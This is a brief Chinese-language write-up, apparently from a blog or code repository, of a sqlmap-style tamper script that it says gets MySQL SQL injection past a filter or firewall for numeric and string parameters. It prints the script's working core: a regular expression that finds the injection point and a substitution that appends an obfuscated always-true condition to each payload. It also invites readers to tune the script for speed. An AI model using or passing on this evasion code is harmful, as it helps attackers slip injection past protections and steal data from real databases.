当前版本的tamper可以绕过Mysql的注入的数字型，字符型，经过测试仅有一个xss警告，不过为了增加执行速度不单独对其增加过滤代码。

tamper中的代码，前三个if判断仅仅是为了减少报错，真正完成匹配并替换的只有以下两句。

rex = '^-{0,1}?[\d|\w]*%{0,1}[\'|"|`]*\\)*[ |;]'                        
payload = re.sub(rex, lambda x:x.group(0)+" %26%26 1!='%23' ", payload)   

可以根据自己的需求删除或增加判断代码，如果追求速度，可以将之前判断进行适当的修改或删除。